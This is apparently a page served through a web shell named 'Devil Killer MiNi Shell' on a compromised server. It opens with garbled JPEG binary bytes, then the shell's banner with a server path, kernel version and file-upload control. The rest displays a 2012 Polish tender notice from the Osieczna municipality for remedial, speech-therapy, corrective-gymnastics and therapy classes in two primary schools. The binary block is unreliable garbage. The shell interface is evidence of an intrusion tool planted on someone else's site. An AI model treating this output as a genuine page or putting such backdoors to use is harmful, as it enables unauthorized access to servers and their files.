JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120125/24052-N-2012.html

<p class="kh_header"><b>Osieczna: Usługi edukacyjne w ramach realizacji projektu nr WND-POKL09.01.02-22-274/11 pod nazwą: Wyrównywanie szans edukacyjno-rozwojowych dzieci klas I-III szkół podstawowych Gminy Osieczna</b><br>
<b>Numer ogłoszenia: 24052 - 2012; data zamieszczenia: 25.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Osiecznej , pl. 1000-lecia 1, 83-242 Osieczna, woj. pomorskie, tel. 0-58 5881468, faks 0-58 5881478.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaosieczna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne w ramach realizacji projektu nr WND-POKL09.01.02-22-274/11 pod nazwą: Wyrównywanie szans edukacyjno-rozwojowych dzieci klas I-III szkół podstawowych Gminy Osieczna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są: Usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu WND-POKL.09.01.02-22-274/11 pod nazwą: Wyrównywanie szans edukacyjnych uczniów klas I-III w Gminie Osieczna.
2.	Przedmiotem zamówienia są usługi polegające na prowadzeniu zajęć pozalekcyjnych w zakresie szkolnictwa podstawowego dla uczniów Publicznej Szkoły Podstawowej w Osiecznej i Publicznej Szkoły Podstawowej w Szlachcie, dla których organem prowadzącym jest Gmina Osieczna.
3.	Realizacja projektu ma na celu wsparcie indywidualnego rozwoju uczniów i uczennic klas I - III szkół podstawowych z terenu gminy Osieczna dostosowanych do zdiagnozowanych potrzeb w okresie realizacji projektu.
4.	Przedmiot zamówienia obejmuje 8 części i został szczegółowo określony w Szczegółowym opisie przedmiotu zamówienia stanowiącym załącznik nr 7 do SIWZ.
2.	Przedmiot zamówienia obejmuje 8 części, tj.:
1)	część I - pełnienie funkcji prowadzącego zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych dysleksją w Publicznej Szkole Podstawowej w Osiecznej, ul. Mickiewicza 1, 83-242 Osieczna, dla 3 grup uczniów, łącznie 90 godzin;
2)	część II - pełnienie funkcji prowadzącego zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych dysleksją w Publicznej Szkole Podstawowej w Szlachcie, ul. 3 Maja 32, 83-243 Szlachta, dla 3 grup uczniów, łącznie 90 godzin;
3)	część III - pełnienie funkcji prowadzącego zajęcia logopedyczne dla dzieci z wadami wymowy w Publicznej Szkole Podstawowej w Osiecznej, ul. Mickiewicza 1, 83-242 Osieczna, dla 6 grup, łącznie 90 godzin;
4)	część IV - pełnienie funkcji prowadzącego zajęcia logopedyczne dla dzieci z wadami wymowy w Publicznej Szkole Podstawowej w Szlachcie, ul. 3 Maja 32, 83-243 Szlachta, dla 5 grup, łącznie 90 godzin;
5)	część V - pełnienie funkcji prowadzącego zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy w Publicznej Szkole Podstawowej w Osiecznej, ul. Mickiewicza 1, 83-242 Osieczna, dla 4 grup, łącznie 90 godzin;
6)	część VI - pełnienie funkcji prowadzącego zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy w Publicznej Szkole Podstawowej w Szlachcie, ul. 3 Maja 32, 83-243 Szlachta, dla 2 grup, łącznie 60 godzin;
7)	część VII - pełnienie funkcji prowadzącego zajęcia terapeutyczne dla uczniów niepełnosprawnych w Publicznej Szkole Podstawowej w Osiecznej, ul. Mickiewicza 1, 83-242 Osieczna, dla 2 grup, łącznie 60 godzin; 
8)	część VIII - prowadzenie funkcji prowadzącego zajęcia terapeutyczne dla uczniów niepełnosprawnych w Publicznej Szkole Podstawowej w Szlachcie, ul. 3 Maja 32, 83-243 Szlachta, dla 3 grup, łącznie 60 godzin.

3.	Szczegółowy zakres zamówienia:
1)	Wykonawcy do przeprowadzenia zajęć, o których mowa w punkcie 2 otrzymają od Zamawiającego narzędzia/materiały dydaktyczne wspomagające prowadzenie zajęć.
2)	Zajęcia, o których mowa w punkcie 2 odbywać się będą w dni nauki szkolnej w przedziale godzin między 8:00 a 15:00, w czasie nie kolidującym z obowiązkowymi zajęciami szkolnymi uczniów uczestniczących w zajęciach, w oparciu o harmonogram zajęć ustalony w porozumieniu z Dyrektorem Szkoły i zatwierdzony przez Koordynatora Projektu.
3)	Do obowiązków prowadzącego zajęcia należeć będzie w szczególności:
a)	opracowanie szczegółowego harmonogramu zajęć i uzyskanie akceptacji Dyrektora Szkoły i Koordynatora Projektu w terminie 7 dni od dnia podpisania umowy (zajęcia prowadzone mogą być wyłącznie w czasie wolnym od zajęć, których realizacja wynika z arkusza organizacji Szkoły z uwzględnieniem godzin przywozu i odwozu dzieci przez transport gminny z wyłączeniem wakacji, przerw świątecznych i innych dni ustawowo wolnych od nauki szkolnej);
b)	opracowanie programu zajęć grupowych i indywidualnych oraz uzyskanie akceptacji Dyrektora Szkoły i Koordynatora Projektu w terminie 10 dni od dnia podpisania umowy;
c)	systematyczne prowadzenie i dokumentowanie zajęć zgodnie z zaleceniami Koordynatora Projektu;
d)	sporządzanie sprawozdań z realizacji zajęć w terminach wskazanych przez Koordynatora Projektu;
e)	współdziałanie z rodzicami/opiekunami prawnymi w sprawach wychowania i nauczania z uwzględnieniem prawa rodziców/opiekunów prawnych do znajomości treści zawartych w programie zajęć grupowych i indywidualnych;
f)	prowadzenie dziennika zajęć oraz innych dokumentów obrazujących możliwości i potrzeby rozwojowe dzieci, stosowane metody pracy z dziećmi oraz osiągane rezultaty zgodnie z zaleceniami Koordynatora Projektu, a także dokumentów niezbędnych do realizacji projektu;
g)	dbałość oraz odpowiedzialność za życie, zdrowie i bezpieczeństwo dzieci podczas zajęć;
h)	sprawowanie opieki nad dziećmi uczestniczącymi w zajęciach;
i)	dbałość o pomieszczenia, sprzęt i urządzenia wykorzystywane do realizacji projektu;
j)	współpraca z kadrą zarządzającą projektu w zakresie bieżącego monitorowania postępu w realizacji określonych wskaźników projektu i innych działań projektowych ze sporządzaniem odpowiedniej dokumentacji;
k)	udostępnianie całej dokumentacji z zakresu realizacji umowy (np. prac uczniów wytworzonych w trakcie prowadzonych zajęć) na żądanie uprawnionego przedstawiciela Zamawiającego lub organom kontrolującym;
l)	realizowanie zaleceń osób/instytucji uprawnionych do kontroli projektu;
m)	wykonywanie innych działań związanych z poprawną realizacją projektu;
n)	ochrona i przetwarzanie danych osobowych dzieci i rodziców/opiekunów prawnych zgodnie z ustawą z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101, poz. 926 ze zmianami) na podstawie imiennego upoważnienia wydanego przez Zamawiającego oraz rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. Nr 100, poz. 1024);
o)	wspomaganie promocji i ewaluacji projektu - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego, przestrzeganie Wytycznych dotyczących oznaczania projektów w ramach POKL;
p)	gromadzenie dokumentacji fotograficznej;
q)	współpraca z Koordynatorem Projektu w zakresie monitoringu oraz ewaluacji projektu.

4)	Z Wykonawcą zostanie/zostaną zawarta/zawarte umowa/umowy na wykonanie usługi - jedna umowa będzie obejmować jedną część zamówienia.
5)	Zamawiający zastrzega sobie możliwość dokonywania kontroli nad realizacją zamówienia w trakcie trwania umowy.
6)	Wynagrodzenie Wykonawcy wypłacane będzie przez Zamawiającego cyklicznie w okresie trwania umowy, na warunkach określonych w umowie.
7)	Rozliczenia między Zamawiającym a Wykonawcą dokonywane będą w złotych polskich.

4.	Cele projektu:
1)	Celem głównym projektu jest wsparcie indywidualnego rozwoju 97 uczniów klas I - III szkół podstawowych Gminy Osieczna dostosowanych do ich zdiagnozowanych potrzeb w okresie realizacji projektu.
2)	Celem szczegółowym projektu jest zmniejszenie dysproporcji edukacyjnych i rozwojowych uczniów i uczennic szkół Gminy Osieczna poprzez udział w dodatkowych zajęciach wyrównawczych w okresie realizacji projektu. 

5.	Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
b)	Potwierdzeniem spełnienia ww. warunku jest podpisane oświadczenie z zakresu art. 22 ust. 1 ustawy Pzp, stanowiące załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
b)	Potwierdzeniem spełnienia ww. warunku jest podpisane oświadczenie z zakresu art. 22 ust. 1 ustawy Pzp, stanowiące załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający żąda od Wykonawcy dysponowania co najmniej jedną osobą posiadającą kwalifikacje do prowadzenia danego typu zajęć, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r. Nr 50, poz. 400).
b)	Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu określone w pkt 2.3), jeżeli z zastrzeżeniem pkt 2.3)c) SIWZ przedstawi:
a.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i wykształcenia niezbędnych dla wykonania zamówienia oraz informacją o podstawie do dysponowania tymi osobami, zgodnie z załącznikiem nr 4 do SIWZ.
b.	Oświadczenie podpisane przez Wykonawcę, że osoba/osoby, która/które będzie/będą uczestniczyć w wykonaniu zamówienia, posiada/posiadają wymagane uprawnienia, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień, stanowiące załącznik nr 5 do SIWZ.
c)	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
b)	Potwierdzeniem spełnienia ww. warunku jest podpisane oświadczenie z zakresu art. 22 ust. 1 ustawy Pzp, stanowiące załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Formularz ofertowy - zgodny z treścią załącznika nr 1 do SIWZ, b) Pełnomocnictwo do podpisania oferty - jeżeli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zapisy dotyczące możliwości wprowadzenia zmian do umowy oraz warunki dokonywania tych zmian zostały szczegółowo opisane w załączniku nr 6 do SIWZ - Wzór umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorskie.eu/pl/bip/gminy/osieczna/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Osieczna
ul. Plac 1000-lecia 1, 83-242 Osieczna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2012 godzina 10:00, miejsce: Urząd Gminy Osieczna - sekretariat (pokój nr 9)
ul. Plac 1000-lecia 1, 83-242 Osieczna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pełnienie funkcji prowadzącego zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych dysleksją w Publicznej Szkole Podstawowej w Osiecznej, ul. Mickiewicza 1, 83-242 Osieczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia dla 3 grup uczniów, łącznie 90 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> pełnienie funkcji prowadzącego zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych dysleksją w Publicznej Szkole Podstawowej w Szlachcie, ul. 3 Maja 32, 83-243 Szlachta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 3 grup uczniów, łącznie 90 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pełnienie funkcji prowadzącego zajęcia logopedyczne dla dzieci z wadami wymowy w Publicznej Szkole Podstawowej w Osiecznej, ul. Mickiewicza 1, 83-242 Osieczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 6 grup, łącznie 90 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pełnienie funkcji prowadzącego zajęcia logopedyczne dla dzieci z wadami wymowy w Publicznej Szkole Podstawowej w Szlachcie, ul. 3 Maja 32, 83-243 Szlachta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 5 grup, łącznie 90 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> pełnienie funkcji prowadzącego zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy w Publicznej Szkole Podstawowej w Osiecznej, ul. Mickiewicza 1, 83-242 Osieczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 4 grup, łącznie 90 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> pełnienie funkcji prowadzącego zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy w Publicznej Szkole Podstawowej w Szlachcie, ul. 3 Maja 32, 83-243 Szlachta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 2 grup, łącznie 60 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> pełnienie funkcji prowadzącego zajęcia terapeutyczne dla uczniów niepełnosprawnych w Publicznej Szkole Podstawowej w Osiecznej, ul. Mickiewicza 1, 83-242 Osieczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 2 grup, łącznie 60 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> prowadzenie funkcji prowadzącego zajęcia terapeutyczne dla uczniów niepełnosprawnych w Publicznej Szkole Podstawowej w Szlachcie, ul. 3 Maja 32, 83-243 Szlachta.</p>
